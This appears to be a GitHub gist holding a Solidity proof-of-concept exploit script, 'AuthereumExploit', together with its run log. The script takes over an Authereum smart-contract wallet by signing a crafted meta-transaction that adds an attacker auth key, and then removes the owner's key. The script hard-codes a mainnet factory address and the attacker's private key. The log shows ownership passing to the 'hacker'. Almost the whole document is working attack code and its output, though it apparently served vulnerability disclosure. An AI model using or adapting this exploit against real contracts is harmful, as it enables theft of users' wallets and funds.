Skip to content

Instantly share code, notes, and snippets.

@samczsun samczsun/exploit.log Secret

Created Feb 19, 2020
Embed
What would you like to do?
[#] running script "AuthereumExploit"
[#] current block is 9504523
[#] running "create wallet" as 0xA80000228CF1a6d4D267Aa7EA2Ba5841d1952d1c with 0.000000000000000000 ether
[wallet-creator] created new wallet 0x7e22846B3Af7Ff0CA209101DF0E06ee15c61e833
[#] finished running "create wallet"
[#] running "test ownership" as 0x8f11F8da4d7547d1b00776C6b7Ae3eC53F2A6dB3 with 0.000000000000000000 ether
[ownership-tester] is the owner authed? true
[ownership-tester] is the hacker authed? false
[#] finished running "test ownership"
[#] running "prepare exploit" as 0x32993258F4Bb0f00e3C25cF00a9b490BF86509D8 with 0.000000000000000000 ether
[hacker] please sign the following hash: 0xaea40ac40991c4bdd045f10e90618d19255de1ff48d1f4a83f5a086ceaf81ea0
[#] finished running "prepare exploit"
[#] running "steal wallet" as 0x32993258F4Bb0f00e3C25cF00a9b490BF86509D8 with 0.000000000000000000 ether
[hacker] executing meta transaction
[hacker] removing owner as authkey
[#] finished running "steal wallet"
[#] running "test ownership" as 0x8f11F8da4d7547d1b00776C6b7Ae3eC53F2A6dB3 with 0.000000000000000000 ether
[ownership-tester] is the owner authed? false
[ownership-tester] is the hacker authed? true
[#] finished running "test ownership"
pragma solidity ^0.5.0;
pragma experimental ABIEncoderV2;
import "./script.sol";
contract AuthereumFactoryLike {
function createProxy(uint256 salt, string memory label, bytes[] memory initData) public returns (AuthereumWalletLike);
}
contract AuthereumWalletLike {
function initializeV1(address) public;
function addAuthKey(address) public;
function removeAuthKey(address) public;
function authKeys(address) public returns (bool);
function nonce() public returns (uint);
function getChainId() public returns (uint);
function executeMultipleAuthKeyMetaTransactions(
bytes[] memory _transactions,
uint256 _gasPrice,
uint256 _gasOverhead,
address _feeTokenAddress,
uint256 _feeTokenRate,
bytes memory _transactionMessageHashSignature
) public returns (bytes[] memory);
}
contract AuthereumExploit is script {
AuthereumFactoryLike private constant FACTORY = AuthereumFactoryLike(0x69c0047531FD1cc24dAa9Eccd221Cb66b53c63f8);
address private constant FACTORY_OWNER = 0xA80000228CF1a6d4D267Aa7EA2Ba5841d1952d1c;
address private constant WALLET_OWNER = 0xDeaDbeefdEAdbeefdEadbEEFdeadbeEFdEaDbeeF;
// private key = 369acbb9f2465fd864eb7458e45d16ff0d47b347b227797a766980c970aeb40e
address private constant HACKER = 0x32993258F4Bb0f00e3C25cF00a9b490BF86509D8;
// signed by the hacker's private key
bytes private constant SIGNATURE = hex"274a0272b7dc3e465a7729bfc8b5e57bbf2e2e0a58e223680350564bbea20b7c7a3050f1ba533673dca92342f058ea178b7fecca02efa30a4b9ff082c7b086aa1c";
AuthereumWalletLike private wallet;
bytes[] private exploitTransactions;
function setup() public {
}
function run() public {
run("create wallet", this.createWallet)
.withCaller(FACTORY_OWNER);
run("test ownership", this.testOwnership);
run("prepare exploit", this.prepareExploit)
.withCaller(HACKER);
run("steal wallet", this.stealWallet)
.withCaller(HACKER);
run("test ownership", this.testOwnership);
}
function createWallet() external {
sys.setName("wallet-creator");
bytes[] memory initData = new bytes[](1);
initData[0] = abi.encodeWithSelector(wallet.initializeV1.selector, WALLET_OWNER);
wallet = FACTORY.createProxy(uint(WALLET_OWNER), "exploit", initData);
fmt.printf("created new wallet %a\n", abi.encode(wallet));
}
function testOwnership() external {
sys.setName("ownership-tester");
fmt.printf("is the owner authed? %b\n", abi.encode(wallet.authKeys(WALLET_OWNER)));
fmt.printf("is the hacker authed? %b\n", abi.encode(wallet.authKeys(HACKER)));
}
function prepareExploit() external {
sys.setName("hacker");
bytes memory exploitData = abi.encodeWithSelector(wallet.addAuthKey.selector, HACKER);
bytes memory exploitTransaction = abi.encode(wallet, 0, uint(-1), exploitData);
exploitTransactions.push(exploitTransaction);
bytes32 hash = keccak256(abi.encodePacked("\x19Ethereum Signed Message:\n32", keccak256(abi.encode(
address(wallet),
wallet.executeMultipleAuthKeyMetaTransactions.selector,
wallet.getChainId(),
wallet.nonce(),
exploitTransactions,
uint(0),
uint(0),
address(0),
uint(0)
))));
fmt.printf("please sign the following hash: %32x\n", abi.encode(hash));
}
function stealWallet() external {
sys.setName("hacker");
if (SIGNATURE.length == 0) {
revert("no signature set");
}
fmt.print("executing meta transaction\n");
wallet.executeMultipleAuthKeyMetaTransactions(
exploitTransactions,
0,
0,
address(0),
0,
SIGNATURE
);
fmt.print("removing owner as authkey\n");
wallet.removeAuthKey(WALLET_OWNER);
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.